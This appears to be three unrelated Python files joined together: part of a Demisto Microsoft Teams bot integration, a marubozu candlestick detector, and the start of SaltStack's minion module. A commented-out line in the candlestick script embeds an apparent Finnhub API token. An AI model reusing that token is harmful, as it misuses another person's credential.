raise ValueError('Provide either message or adaptive to send, not both.')
integration_context: dict = demisto.getIntegrationContext()
channel_id: str = str()
personal_conversation_id: str = str()
if channel_name:
team_name: str = demisto.args().get('team', '') or demisto.params().get('team', '')
team_aad_id: str = get_team_aad_id(team_name)
investigation_id: str = str()
if message_type == MESSAGE_TYPES['mirror_entry']:
# Got an entry from the War Room to mirror to Teams
# Getting investigation ID in case channel name is custom and not the default
investigation: dict = demisto.investigation()
investigation_id = investigation.get('id', '')
channel_id = get_channel_id(channel_name, team_aad_id, investigation_id)
elif team_member:
team_member_id: str = get_team_member_id(team_member, integration_context)
personal_conversation_id = create_personal_conversation(integration_context, team_member_id)
recipient: str = channel_id or personal_conversation_id
conversation: dict
if message:
entitlement_match: Optional[Match[str]] = re.search(ENTITLEMENT_REGEX, message)
if entitlement_match:
# In TeamsAsk process
adaptive_card = process_ask_user(message)
conversation = {
'type': 'message',
'attachments': [adaptive_card]
}
else:
# Sending regular message
formatted_message: str = urlify_hyperlinks(message)
conversation = {
'type': 'message',
'text': formatted_message
}
else: # Adaptive card
conversation = {
'type': 'message',
'attachments': [adaptive_card]
}
service_url: str = integration_context.get('service_url', '')
if not service_url:
raise ValueError('Did not find service URL. Try messaging the bot on Microsoft Teams')
send_message_request(service_url, recipient, conversation)
demisto.results('Message was sent successfully.')
def mirror_investigation():
"""
Updates the integration context with a new or existing mirror.
"""
investigation: dict = demisto.investigation()
if investigation.get('type') == PLAYGROUND_INVESTIGATION_TYPE:
raise ValueError('Can not perform this action in playground.')
integration_context: dict = demisto.getIntegrationContext()
mirror_type: str = demisto.args().get('mirror_type', 'all')
auto_close: str = demisto.args().get('autoclose', 'true')
mirror_direction: str = demisto.args().get('direction', 'both').lower()
team_name: str = demisto.args().get('team', '')
if not team_name:
team_name = demisto.params().get('team', '')
team_aad_id: str = get_team_aad_id(team_name)
mirrored_channels: list = list()
teams: list = json.loads(integration_context.get('teams', '[]'))
team: dict = dict()
for team in teams:
if team.get('team_aad_id', '') == team_aad_id:
if team.get('mirrored_channels'):
mirrored_channels = team['mirrored_channels']
break
if mirror_direction != 'both':
mirror_type = f'{mirror_type}:{mirror_direction}'
investigation_id: str = investigation.get('id', '')
investigation_mirrored_index: int = is_investigation_mirrored(investigation_id, mirrored_channels)
if investigation_mirrored_index > -1:
# Updating channel mirror configuration
mirrored_channels[investigation_mirrored_index]['mirror_type'] = mirror_type
mirrored_channels[investigation_mirrored_index]['mirror_direction'] = mirror_direction
mirrored_channels[investigation_mirrored_index]['auto_close'] = auto_close
mirrored_channels[investigation_mirrored_index]['mirrored'] = False
demisto.results('Investigation mirror was updated successfully.')
else:
channel_name: str = demisto.args().get('channel_name', '') or f'incident-{investigation_id}'
channel_description: str = f'Channel to mirror incident {investigation_id}'
channel_id: str = create_channel(team_aad_id, channel_name, channel_description)
service_url: str = integration_context.get('service_url', '')
server_links: dict = demisto.demistoUrls()
server_link: str = server_links.get('server', '')
warroom_link: str = f'{server_link}#/WarRoom/{investigation_id}'
conversation: dict = {
'type': 'message',
'text': f'This channel was created to mirror [incident {investigation_id}]({warroom_link}) '
f'between Teams and Demisto. In order for your Teams messages to be mirrored in Demisto, '
f'you need to mention the Demisto Bot in the message.'
}
send_message_request(service_url, channel_id, conversation)
mirrored_channels.append({
'channel_id': channel_id,
'investigation_id': investigation_id,
'mirror_type': mirror_type,
'mirror_direction': mirror_direction,
'auto_close': auto_close,
'mirrored': False,
'channel_name': channel_name
})
demisto.results(f'Investigation mirrored successfully in channel {channel_name}.')
team['mirrored_channels'] = mirrored_channels
integration_context['teams'] = json.dumps(teams)
demisto.setIntegrationContext(integration_context)
def channel_mirror_loop():
"""
Runs in a long running container - checking for newly mirrored investigations.
"""
while True:
found_channel_to_mirror: bool = False
try:
integration_context = demisto.getIntegrationContext()
teams: list = json.loads(integration_context.get('teams', '[]'))
for team in teams:
mirrored_channels = team.get('mirrored_channels', [])
channel: dict
for channel in mirrored_channels:
investigation_id = channel.get('investigation_id', '')
if not channel['mirrored']:
demisto.info(f'Mirroring incident: {investigation_id} in Microsoft Teams')
channel_to_update: dict = channel
if channel_to_update['mirror_direction'] and channel_to_update['mirror_type']:
demisto.mirrorInvestigation(
channel_to_update['investigation_id'],
channel_to_update['mirror_type'],
bool(strtobool(channel_to_update['auto_close']))
)
channel_to_update['mirrored'] = True
demisto.info(f'Mirrored incident: {investigation_id} to Microsoft Teams successfully')
else:
demisto.info(f'Could not mirror {investigation_id}')
team['mirrored_channels'] = mirrored_channels
integration_context['teams'] = json.dumps(teams)
demisto.setIntegrationContext(integration_context)
found_channel_to_mirror = True
break
if found_channel_to_mirror:
break
except Exception as e:
demisto.error(f'An error occurred in channel mirror loop: {str(e)}')
demisto.updateModuleHealth(f'An error occurred: {str(e)}')
finally:
time.sleep(5)
def member_added_handler(integration_context: dict, request_body: dict, channel_data: dict):
"""
Handles member added activity
:param integration_context: Cached object to retrieve relevant data from
:param request_body: Activity payload
:param channel_data: Microsoft Teams tenant, team and channel details
:return: None
"""
bot_id = demisto.params().get('bot_id')
team: dict = channel_data.get('team', {})
team_id: str = team.get('id', '')
team_aad_id: str = team.get('aadGroupId', '')
team_name: str = team.get('name', '')
tenant: dict = channel_data.get('tenant', {})
tenant_id: str = tenant.get('id', '')
recipient: dict = request_body.get('recipient', {})
recipient_name: str = recipient.get('name', '')
members_added: list = request_body.get('membersAdded', [])
teams: list = json.loads(integration_context.get('teams', '[]'))
service_url: str = integration_context.get('service_url', '')
if not service_url:
raise ValueError('Did not find service URL. Try messaging the bot on Microsoft Teams')
for member in members_added:
member_id = member.get('id', '')
if bot_id in member_id:
# The bot was added to a team, caching team ID and team members
demisto.info(f'The bot was added to team {team_name}')
integration_context['tenant_id'] = tenant_id
integration_context['bot_name'] = recipient_name
break
team_members: list = get_team_members(service_url, team_id)
found_team: bool = False
for team in teams:
if team.get('team_aad_id', '') == team_aad_id:
team['team_members'] = team_members
found_team = True
break
if not found_team:
# Didn't found an existing team, adding new team object
teams.append({
'team_aad_id': team_aad_id,
'team_id': team_id,
'team_name': team_name,
'team_members': team_members
})
integration_context['teams'] = json.dumps(teams)
demisto.setIntegrationContext(integration_context)
def direct_message_handler(integration_context: dict, request_body: dict, conversation: dict, message: str):
"""
Handles a direct message sent to the bot
:param integration_context: Cached object to retrieve relevant data from
:param request_body: Activity payload
:param conversation: Conversation object sent
:param message: The direct message sent
:return: None
"""
conversation_id: str = conversation.get('id', '')
from_property: dict = request_body.get('from', {})
user_id: str = from_property.get('id', '')
team_member: dict = get_team_member(integration_context, user_id)
username: str = team_member.get('username', '')
user_email: str = team_member.get('user_email', '')
formatted_message: str = str()
attachment: dict = dict()
return_card: bool = False
allow_external_incidents_creation: bool = demisto.params().get('allow_external_incidents_creation', False)
lowered_message = message.lower()
if lowered_message.find('incident') != -1 and (lowered_message.find('create') != -1
or lowered_message.find('open') != -1
or lowered_message.find('new') != -1):
if user_email:
demisto_user = demisto.findUser(email=user_email)
else:
demisto_user = demisto.findUser(username=username)
if not demisto_user and not allow_external_incidents_creation:
data = 'You are not allowed to create incidents.'
else:
data = process_incident_create_message(demisto_user, message)
formatted_message = urlify_hyperlinks(data)
else:
try:
data = demisto.directMessage(message, username, user_email, allow_external_incidents_creation)
return_card = True
if data.startswith('`'): # We got a list of incidents/tasks:
data_by_line: list = data.replace('```', '').strip().split('\n')
return_card = True
if data_by_line[0].startswith('Task'):
attachment = process_tasks_list(data_by_line)
else:
attachment = process_incidents_list(data_by_line)
else: # Mirror investigation command / unknown direct message
attachment = process_mirror_or_unknown_message(data)
except Exception as e:
data = str(e)
if return_card:
conversation = {
'type': 'message',
'attachments': [attachment]
}
else:
formatted_message = formatted_message or data
conversation = {
'type': 'message',
'text': formatted_message
}
service_url: str = integration_context.get('service_url', '')
if not service_url:
raise ValueError('Did not find service URL. Try messaging the bot on Microsoft Teams')
send_message_request(service_url, conversation_id, conversation)
def entitlement_handler(integration_context: dict, request_body: dict, value: dict, conversation_id: str):
"""
Handles activity the bot received as part of TeamsAsk flow, which includes entitlement
:param integration_context: Cached object to retrieve relevant data from
:param request_body: Activity payload
:param value: Object which includes
:param conversation_id: Message conversation ID
:return: None
"""
response: str = value.get('response', '')
entitlement_guid: str = value.get('entitlement', '')
investigation_id: str = value.get('investigation_id', '')
task_id: str = value.get('task_id', '')
from_property: dict = request_body.get('from', {})
team_members_id: str = from_property.get('id', '')
team_member: dict = get_team_member(integration_context, team_members_id)
demisto.handleEntitlementForUser(
incidentID=investigation_id,
guid=entitlement_guid,
taskID=task_id,
email=team_member.get('user_email', ''),
content=response
)
activity_id: str = request_body.get('replyToId', '')
service_url: str = integration_context.get('service_url', '')
if not service_url:
raise ValueError('Did not find service URL. Try messaging the bot on Microsoft Teams')
update_message(service_url, conversation_id, activity_id, 'Your response was submitted successfully.')
def message_handler(integration_context: dict, request_body: dict, channel_data: dict, message: str):
"""
Handles a message in which the bot was mentioned
:param integration_context: Cached object to retrieve relevant data from
:param request_body: Activity payload
:param channel_data: Microsoft Teams tenant, team and channel details
:param message: The message which was sent mentioning the bot
:return: None
"""
channel: dict = channel_data.get('channel', {})
channel_id: str = channel.get('id', '')
team_id: str = channel_data.get('team', {}).get('id', '')
from_property: dict = request_body.get('from', {})
team_member_id: str = from_property.get('id', '')
if integration_context.get('teams'):
teams: list = json.loads(integration_context['teams'])
for team in teams:
if team.get('team_id', '') == team_id:
mirrored_channels: list = team.get('mirrored_channels', [])
for mirrored_channel in mirrored_channels:
if mirrored_channel.get('channel_id') == channel_id:
if mirrored_channel.get('mirror_direction', '') != 'FromDemisto' \
and 'none' not in mirrored_channel.get('mirror_type', ''):
investigation_id: str = mirrored_channel.get('investigation_id', '')
username: str = from_property.get('name', '')
user_email: str = get_team_member(integration_context, team_member_id).get('user_mail', '')
demisto.addEntry(
id=investigation_id,
entry=message,
username=username,
email=user_email,
footer=f'\n**{ENTRY_FOOTER}**'
)
return
@APP.route('/', methods=['POST'])
def messages() -> Response:
"""
Main handler for messages sent to the bot
"""
headers: dict = cast(Dict[Any, Any], request.headers)
if validate_auth_header(headers) is False:
demisto.info(f'Authorization header failed: {str(headers)}')
else:
request_body: dict = request.json
integration_context: dict = demisto.getIntegrationContext()
service_url: str = request_body.get('serviceUrl', '')
if service_url:
service_url = service_url[:-1] if service_url.endswith('/') else service_url
integration_context['service_url'] = service_url
demisto.setIntegrationContext(integration_context)
channel_data: dict = request_body.get('channelData', {})
event_type: str = channel_data.get('eventType', '')
conversation: dict = request_body.get('conversation', {})
conversation_type: str = conversation.get('conversationType', '')
conversation_id: str = conversation.get('id', '')
message_text: str = request_body.get('text', '')
# Remove bot mention
bot_name = integration_context.get('bot_name', '')
formatted_message: str = message_text.replace(f'<at>{bot_name}</at>', '')
value: dict = request_body.get('value', {})
if event_type == 'teamMemberAdded':
demisto.info('New Microsoft Teams team member was added')
member_added_handler(integration_context, request_body, channel_data)
elif value:
# In TeamsAsk process
demisto.info('Got response from user in MicrosoftTeamsAsk process')
entitlement_handler(integration_context, request_body, value, conversation_id)
elif conversation_type == 'personal':
demisto.info('Got direct message to the bot')
direct_message_handler(integration_context, request_body, conversation, formatted_message)
else:
demisto.info('Got message mentioning the bot')
message_handler(integration_context, request_body, channel_data, formatted_message)
demisto.info('Finished processing Microsoft Teams activity successfully')
demisto.updateModuleHealth('')
return Response(status=200)
def long_running_loop():
"""
The infinite loop which runs the mirror loop and the bot app in two different threads
"""
certificate: str = demisto.params().get('certificate', '')
private_key: str = demisto.params().get('key', '')
certificate_path = str()
private_key_path = str()
try:
port_mapping: str = PARAMS.get('longRunningPort', '')
port: int
if port_mapping:
if ':' in port_mapping:
port = int(port_mapping.split(':')[1])
else:
port = int(port_mapping)
else:
raise ValueError('No port mapping was provided')
Thread(target=channel_mirror_loop, daemon=True).start()
demisto.info('Started channel mirror loop thread')
ssl_args = dict()
if certificate and private_key:
certificate_file = NamedTemporaryFile(delete=False)
certificate_path = certificate_file.name
certificate_file.write(bytes(certificate, 'utf-8'))
certificate_file.close()
ssl_args['certfile'] = certificate_path
private_key_file = NamedTemporaryFile(delete=False)
private_key_path = private_key_file.name
private_key_file.write(bytes(private_key, 'utf-8'))
private_key_file.close()
ssl_args['keyfile'] = private_key_path
demisto.info('Starting HTTPS Server')
else:
demisto.info('Starting HTTP Server')
server = WSGIServer(('', port), APP, **ssl_args)
server.serve_forever()
except Exception as e:
if certificate_path:
os.unlink(certificate_path)
if private_key_path:
os.unlink(private_key_path)
demisto.error(f'An error occurred in long running loop: {str(e)}')
raise ValueError(str(e))
def test_module():
"""
Tests token retrieval for Bot Framework API
"""
get_bot_access_token()
demisto.results('ok')
def main():
""" COMMANDS MANAGER / SWITCH PANEL """
commands: dict = {
'test-module': test_module,
'long-running-execution': long_running_loop,
'send-notification': send_message,
'mirror-investigation': mirror_investigation,
'close-channel': close_channel,
'microsoft-teams-integration-health': integration_health
# 'microsoft-teams-create-team': create_team,
# 'microsoft-teams-send-file': send_file,
}
''' EXECUTION '''
try:
handle_proxy()
command: str = demisto.command()
LOG(f'Command being called is {command}')
if command in commands.keys():
commands[command]()
# Log exceptions
except Exception as e:
if command == 'long-running-execution':
LOG(str(e))
LOG.print_log()
demisto.updateModuleHealth(str(e))
else:
return_error(str(e))
if __name__ == 'builtins':
main()
|
marabuzo.py
|
##final code for marobuzo recognition
# import threading
# import pandas as pd
# from queue import Queue
# import time
# file = open("stock_pred.txt", "w")
# data = pd.read_csv("C:\\Users\\BEST BUY\\Desktop\\NASDAQ_20200331.csv")
# symbols = data.iloc[:,0:1].values
# th = Queue(maxsize = 4000)
def marabuzo(arg):
# print(i[0])
# string = 'https://finnhub.io/api/v1/stock/candle?symbol='+ i[0] +'&resolution=D&count=1&token=bq24qknrh5rc5ioodhhg'
# r = requests.get(string)
# print(r.content)
# if (str(r.headers.get('content-type'))) != "application/json; charset=utf-8":
# print("-----------------")
# th.put(threading.Thread(target=net_work, args = [i]))
# return
c = arg['close']
h = arg['high']
l = arg['low']
o = arg['open']
if (c > o):
if o != c:
if ((((c-h)/c)*100) <= 0.5 and (((o-l)/o)*100) <= 0.5 and ((h-c)/(c-o)*100) <= 5 and ((o-l)/(c-o)*100) <= 5):
return(2)
# print("bullish Marabozu at " + str(i[0]))
# file.write("bullish Marabozu at " + str(i[0])+ "\n" + " c = " + str(c) + " h = " + str(h)+ " o= " + str(o)+ " l = " + str(l) + "\n\n")
else:
if o != c:
if ((((h-o)/o)*100) <= 0.5 and (((c-l)/c)*100)<= 0.5 and ((h-o)/(o-c)*100) <= 5 and ((c-l)/(o-c)*100) <= 5):
return(0)
# print("bearish Marabozu at " + str(i[0]))
# file.write("bearish Marabozu at " + str(i[0])+ "\n" + " c = " + str(c) + " h = " + str(h)+ " o= " + str(o) + " l = " + str(l) + "\n\n")
return(1)
|
minion.py
|
# -*- coding: utf-8 -*-
'''
Routines to set up a minion
'''
# Import python libs
from __future__ import absolute_import, print_function, with_statement
import os
import re
import sys
import copy
import time
import types
import signal
import fnmatch
import logging
import threading
import traceback
import contextlib
import multiprocessing
from random import randint, shuffle
from stat import S_IMODE
# Import Salt Libs
# pylint: disable=import-error,no-name-in-module,redefined-builtin
import salt.ext.six as six
if six.PY3:
import ipaddress
else:
import salt.ext.ipaddress as ipaddress
from salt.ext.six.moves import range
# pylint: enable=no-name-in-module,redefined-builtin
# Import third party libs
try:
import zmq
# TODO: cleanup
import zmq.eventloop.ioloop
# support pyzmq 13.0.x, TODO: remove once we force people to 14.0.x
if not hasattr(zmq.eventloop.ioloop, 'ZMQIOLoop'):
zmq.eventloop.ioloop.ZMQIOLoop = zmq.eventloop.ioloop.IOLoop
LOOP_CLASS = zmq.eventloop.ioloop.ZMQIOLoop
HAS_ZMQ = True
except ImportError:
import tornado.ioloop
LOOP_CLASS = tornado.ioloop.IOLoop
HAS_ZMQ = False
HAS_RANGE = False
try:
import seco.range
HAS_RANGE = True
except ImportError:
pass
HAS_PSUTIL = False
try:
import salt.utils.psutil_compat as psutil
HAS_PSUTIL = True
except ImportError:
pass
HAS_RESOURCE = False
try:
import resource
HAS_RESOURCE = True
except ImportError:
pass
try:
import zmq.utils.monitor
HAS_ZMQ_MONITOR = True
except ImportError:
HAS_ZMQ_MONITOR = False
# pylint: enable=import-error
# Import salt libs
import salt
import salt.client
import salt.crypt
import salt.loader
import salt.beacons
import salt.engines
import salt.payload
import salt.syspaths
import salt.utils
import salt.utils.dictupdate
import salt.utils.context
import salt.utils.jid
import salt.pillar
import salt.utils.args
import salt.utils.event
import salt.utils.minion
import salt.utils.minions
import salt.utils.schedule
import salt.utils.error
import salt.utils.zeromq
import salt.defaults.exitcodes
import salt.cli.daemons
import salt.log.setup
from salt.config import DEFAULT_MINION_OPTS
from salt.defaults import DEFAULT_TARGET_DELIM
from salt.executors import FUNCTION_EXECUTORS
from salt.utils.debug import enable_sigusr1_handler
from salt.utils.event import tagify
from salt.utils.odict import OrderedDict
from salt.utils.process import (default_signals,
SignalHandlingMultiprocessingProcess,
ProcessManager)
from salt.exceptions import (
CommandExecutionError,
CommandNotFoundError,
SaltInvocationError,
SaltReqTimeoutError,
SaltClientError,
SaltSystemExit,
SaltDaemonNotRunning,
SaltException,
)
import tornado.gen # pylint: disable=F0401
import tornado.ioloop # pylint: disable=F0401
log = logging.getLogger(__name__)
# To set up a minion:
# 1. Read in the configuration
# 2. Generate the function mapping dict
# 3. Authenticate with the master
# 4. Store the AES key
# 5. Connect to the publisher
# 6. Handle publications
def resolve_dns(opts, fallback=True):
'''
Resolves the master_ip and master_uri options
'''
ret = {}
check_dns = True
if (opts.get('file_client', 'remote') == 'local' and
not opts.get('use_master_when_local', False)):
check_dns = False
if check_dns is True:
# Because I import salt.log below I need to re-import salt.utils here
import salt.utils
try:
if opts['master'] == '':
raise SaltSystemExit
ret['master_ip'] = \
salt.utils.dns_check(opts['master'], True, opts['ipv6'])
except SaltClientError:
if opts['retry_dns']:
while True:
import salt.log
msg = ('Master hostname: \'{0}\' not found. Retrying in {1} '
'seconds').format(opts['master'], opts['retry_dns'])
if salt.log.setup.is_console_configured():
log.error(msg)
else:
print('WARNING: {0}'.format(msg))
time.sleep(opts['retry_dns'])
try:
ret['master_ip'] = salt.utils.dns_check(
opts['master'], True, opts['ipv6']
)
break
except SaltClientError:
pass
else:
if fallback:
ret['master_ip'] = '127.0.0.1'
else:
raise
except SaltSystemExit:
unknown_str = 'unknown address'
master = opts.get('master', unknown_str)
if master == '':
master = unknown_str
if opts.get('__role') == 'syndic':
err = 'Master address: \'{0}\' could not be resolved. Invalid or unresolveable address. Set \'syndic_master\' value in minion config.'.format(master)
else:
err = 'Master address: \'{0}\' could not be resolved. Invalid or unresolveable address. Set \'master\' value in minion config.'.format(master)
log.error(err)
raise SaltSystemExit(code=42, msg=err)
else:
ret['master_ip'] = '127.0.0.1'
if 'master_ip' in ret and 'master_ip' in opts:
if ret['master_ip'] != opts['master_ip']:
log.warning('Master ip address changed from {0} to {1}'.format(opts['master_ip'],
ret['master_ip'])
)
ret['master_uri'] = 'tcp://{ip}:{port}'.format(ip=ret['master_ip'],
port=opts['master_port'])
return ret
def prep_ip_port(opts):
ret = {}
if opts['master_uri_format'] == 'ip_only':
ret['master'] = opts['master']
else:
ip_port = opts['master'].rsplit(":", 1)
if len(ip_port) == 1:
# e.g. master: mysaltmaster
ret['master'] = ip_port[0]
else:
# e.g. master: localhost:1234
# e.g. master: 127.0.0.1:1234
# e.g. master: ::1:1234
ret['master'] = ip_port[0]
ret['master_port'] = ip_port[1]
return ret
def get_proc_dir(cachedir, **kwargs):
'''
Given the cache directory, return the directory that process data is
stored in, creating it if it doesn't exist.
The following optional Keyword Arguments are handled:
mode: which is anything os.makedir would accept as mode.
uid: the uid to set, if not set, or it is None or -1 no changes are
made. Same applies if the directory is already owned by this
uid. Must be int. Works only on unix/unix like systems.
gid: the gid to set, if not set, or it is None or -1 no changes are
made. Same applies if the directory is already owned by this
gid. Must be int. Works only on unix/unix like systems.
'''
fn_ = os.path.join(cachedir, 'proc')
mode = kwargs.pop('mode', None)
if mode is None:
mode = {}
else:
mode = {'mode': mode}
if not os.path.isdir(fn_):
# proc_dir is not present, create it with mode settings
os.makedirs(fn_, **mode)
d_stat = os.stat(fn_)
# if mode is not an empty dict then we have an explicit
# dir mode. So lets check if mode needs to be changed.
if mode:
mode_part = S_IMODE(d_stat.st_mode)
if mode_part != mode['mode']:
os.chmod(fn_, (d_stat.st_mode ^ mode_part) | mode['mode'])
if hasattr(os, 'chown'):
# only on unix/unix like systems
uid = kwargs.pop('uid', -1)
gid = kwargs.pop('gid', -1)
# if uid and gid are both -1 then go ahead with
# no changes at all
if (d_stat.st_uid != uid or d_stat.st_gid != gid) and \
[i for i in (uid, gid) if i != -1]:
os.chown(fn_, uid, gid)
return fn_
def load_args_and_kwargs(func, args, data=None, ignore_invalid=False):
'''
Detect the args and kwargs that need to be passed to a function call, and
check them against what was passed.
'''
argspec = salt.utils.args.get_function_argspec(func)
_args = []
_kwargs = {}
invalid_kwargs = []
for arg in args:
if isinstance(arg, six.string_types):
string_arg, string_kwarg = salt.utils.args.parse_input([arg], condition=False) # pylint: disable=W0632
if string_arg:
# Don't append the version that was just derived from parse_cli
# above, that would result in a 2nd call to
# salt.utils.cli.yamlify_arg(), which could mangle the input.
_args.append(arg)
elif string_kwarg:
salt.utils.warn_until(
'Nitrogen',
'The list of function args and kwargs should be parsed '
'by salt.utils.args.parse_input() before calling '
'salt.minion.load_args_and_kwargs().'
)
if argspec.keywords or next(six.iterkeys(string_kwarg)) in argspec.args:
# Function supports **kwargs or is a positional argument to
# the function.
_kwargs.update(string_kwarg)
else:
# **kwargs not in argspec and parsed argument name not in
# list of positional arguments. This keyword argument is
# invalid.
for key, val in six.iteritems(string_kwarg):
invalid_kwargs.append('{0}={1}'.format(key, val))
continue
# if the arg is a dict with __kwarg__ == True, then its a kwarg
elif isinstance(arg, dict) and arg.pop('__kwarg__', False) is True:
for key, val in six.iteritems(arg):
if argspec.keywords or key in argspec.args:
# Function supports **kwargs or is a positional argument to
# the function.
_kwargs[key] = val
else:
# **kwargs not in argspec and parsed argument name not in
# list of positional arguments. This keyword argument is
# invalid.
invalid_kwargs.append('{0}={1}'.format(key, val))
continue
else:
_args.append(arg)
if invalid_kwargs and not ignore_invalid:
salt.utils.invalid_kwargs(invalid_kwargs)
if argspec.keywords and isinstance(data, dict):
# this function accepts **kwargs, pack in the publish data
for key, val in six.iteritems(data):
_kwargs['__pub_{0}'.format(key)] = val
return _args, _kwargs
def eval_master_func(opts):
'''
Evaluate master function if master type is 'func'
and save it result in opts['master']
'''
if '__master_func_evaluated' not in opts:
# split module and function and try loading the module
mod_fun = opts['master']
mod, fun = mod_fun.split('.')
try:
master_mod = salt.loader.raw_mod(opts, mod, fun)
if not master_mod:
raise KeyError
# we take whatever the module returns as master address
opts['master'] = master_mod[mod_fun]()
if not isinstance(opts['master'], str):
raise TypeError
opts['__master_func_evaluated'] = True
except KeyError:
log.error('Failed to load module {0}'.format(mod_fun))
sys.exit(salt.defaults.exitcodes.EX_GENERIC)
except TypeError:
log.error('{0} returned from {1} is not a string'.format(opts['master'], mod_fun))
sys.exit(salt.defaults.exitcodes.EX_GENERIC)
log.info('Evaluated master from module: {0}'.format(mod_fun))
def master_event(type, master=None):
'''
Centralized master event function which will return event type based on event_map
'''
event_map = {'connected': '__master_connected',
'disconnected': '__master_disconnected',
'failback': '__master_failback',
'alive': '__master_alive'}
if type == 'alive' and master is not None:
return '{0}_{1}'.format(event_map.get(type), master)
return event_map.get(type, None)
class MinionBase(object):
def __init__(self, opts):
self.opts = opts
@staticmethod
def process_schedule(minion, loop_interval):
try:
if hasattr(minion, 'schedule'):
minion.schedule.eval()
else:
log.error('Minion scheduler not initialized. Scheduled jobs will not be run.')
return
# Check if scheduler requires lower loop interval than
# the loop_interval setting
if minion.schedule.loop_interval < loop_interval:
loop_interval = minion.schedule.loop_interval
log.debug(
'Overriding loop_interval because of scheduled jobs.'
)
except Exception as exc:
log.error(
'Exception {0} occurred in scheduled job'.format(exc)
)
return loop_interval
def process_beacons(self, functions):
'''
Evaluate all of the configured beacons, grab the config again in case
the pillar or grains changed
'''
if 'config.merge' in functions:
b_conf = functions['config.merge']('beacons', self.opts['beacons'], omit_opts=True)
if b_conf:
return self.beacons.process(b_conf, self.opts['grains']) # pylint: disable=no-member
return []
@tornado.gen.coroutine
def eval_master(self,
opts,
timeout=60,
safe=True,
failed=False,
failback=False):
'''
Evaluates and returns a tuple of the current master address and the pub_channel.
In standard mode, just creates a pub_channel with the given master address.
With master_type=func evaluates the current master address from the given
module and then creates a pub_channel.
With master_type=failover takes the list of masters and loops through them.
The first one that allows the minion to create a pub_channel is then
returned. If this function is called outside the minions initialization
phase (for example from the minions main event-loop when a master connection
loss was detected), 'failed' should be set to True. The current
(possibly failed) master will then be removed from the list of masters.
'''
# return early if we are not connecting to a master
if opts['master_type'] == 'disable':
log.warning('Master is set to disable, skipping connection')
self.connected = False
raise tornado.gen.Return((None, None))
# check if master_type was altered from its default
elif opts['master_type'] != 'str' and opts['__role'] != 'syndic':
# check for a valid keyword
if opts['master_type'] == 'func':
eval_master_func(opts)
# if failover is set, master has to be of type list
elif opts['master_type'] == 'failover':
if isinstance(opts['master'], list):
log.info('Got list of available master addresses:'
' {0}'.format(opts['master']))
if opts['master_shuffle']:
if opts['master_failback']:
secondary_masters = opts['master'][1:]
shuffle(secondary_masters)
opts['master'][1:] = secondary_masters
else:
shuffle(opts['master'])
opts['auth_tries'] = 0
if opts['master_failback'] and opts['master_failback_interval'] == 0:
opts['master_failback_interval'] = opts['master_alive_interval']
# if opts['master'] is a str and we have never created opts['master_list']
elif isinstance(opts['master'], str) and ('master_list' not in opts):
# We have a string, but a list was what was intended. Convert.
# See issue 23611 for details
opts['master'] = [opts['master']]
elif opts['__role'] == 'syndic':
log.info('Syndic setting master_syndic to \'{0}\''.format(opts['master']))
# if failed=True, the minion was previously connected
# we're probably called from the minions main-event-loop
# because a master connection loss was detected. remove
# the possibly failed master from the list of masters.
elif failed:
if failback:
# failback list of masters to original config
opts['master'] = opts['master_list']
else:
log.info('Moving possibly failed master {0} to the end of'
' the list of masters'.format(opts['master']))
if opts['master'] in opts['local_masters']:
# create new list of master with the possibly failed
# one moved to the end
failed_master = opts['master']
opts['master'] = [x for x in opts['local_masters'] if opts['master'] != x]
opts['master'].append(failed_master)
else:
opts['master'] = opts['master_list']
else:
msg = ('master_type set to \'failover\' but \'master\' '
'is not of type list but of type '
'{0}'.format(type(opts['master'])))
log.error(msg)
sys.exit(salt.defaults.exitcodes.EX_GENERIC)
# If failover is set, minion have to failover on DNS errors instead of retry DNS resolve.
# See issue 21082 for details
if opts['retry_dns']:
msg = ('\'master_type\' set to \'failover\' but \'retry_dns\' is not 0. '
'Setting \'retry_dns\' to 0 to failover to the next master on DNS errors.')
log.critical(msg)
opts['retry_dns'] = 0
else:
msg = ('Invalid keyword \'{0}\' for variable '
'\'master_type\''.format(opts['master_type']))
log.error(msg)
sys.exit(salt.defaults.exitcodes.EX_GENERIC)
# FIXME: if SMinion don't define io_loop, it can't switch master see #29088
# Specify kwargs for the channel factory so that SMinion doesn't need to define an io_loop
# (The channel factories will set a default if the kwarg isn't passed)
factory_kwargs = {'timeout': timeout, 'safe': safe}
if getattr(self, 'io_loop', None):
factory_kwargs['io_loop'] = self.io_loop # pylint: disable=no-member
tries = opts.get('master_tries', 1)
attempts = 0
resolve_dns_fallback = opts.get('resolve_dns_fallback', False)
# if we have a list of masters, loop through them and be
# happy with the first one that allows us to connect
if isinstance(opts['master'], list):
conn = False
# shuffle the masters and then loop through them
opts['local_masters'] = copy.copy(opts['master'])
if opts['random_master']:
shuffle(opts['local_masters'])
last_exc = None
while True:
attempts += 1
if tries > 0:
log.debug('Connecting to master. Attempt {0} '
'of {1}'.format(attempts, tries)
)
else:
log.debug('Connecting to master. Attempt {0} '
'(infinite attempts)'.format(attempts)
)
for master in opts['local_masters']:
opts['master'] = master
opts.update(prep_ip_port(opts))
try:
opts.update(resolve_dns(opts, fallback=resolve_dns_fallback))
except SaltClientError as exc:
last_exc = exc
msg = ('Master hostname: \'{0}\' not found. Trying '
'next master (if any)'.format(opts['master']))
log.info(msg)
continue
# on first run, update self.opts with the whole master list
# to enable a minion to re-use old masters if they get fixed
if 'master_list' not in opts:
opts['master_list'] = copy.copy(opts['local_masters'])
self.opts = opts
try:
pub_channel = salt.transport.client.AsyncPubChannel.factory(opts, **factory_kwargs)
yield pub_channel.connect()
conn = True
break
except SaltClientError as exc:
last_exc = exc
msg = ('Master {0} could not be reached, trying '
'next master (if any)'.format(opts['master']))
log.info(msg)
continue
if not conn:
if attempts == tries:
# Exhausted all attempts. Return exception.
self.connected = False
self.opts['master'] = copy.copy(self.opts['local_masters'])
msg = ('No master could be reached or all masters '
'denied the minions connection attempt.')
log.error(msg)
# If the code reaches this point, 'last_exc'
# should already be set.
raise last_exc # pylint: disable=E0702
else:
self.tok = pub_channel.auth.gen_token('salt')
self.connected = True
raise tornado.gen.Return((opts['master'], pub_channel))
# single master sign in
else:
if opts['random_master']:
log.warning('random_master is True but there is only one master specified. Ignoring.')
while True:
attempts += 1
if tries > 0:
log.debug('Connecting to master. Attempt {0} '
'of {1}'.format(attempts, tries)
)
else:
log.debug('Connecting to master. Attempt {0} '
'(infinite attempts)'.format(attempts)
)
opts.update(prep_ip_port(opts))
try:
opts.update(resolve_dns(opts, fallback=resolve_dns_fallback))
if self.opts['transport'] == 'detect':
self.opts['detect_mode'] = True
for trans in ('zeromq', 'tcp'):
if trans == 'zeromq' and not HAS_ZMQ:
continue
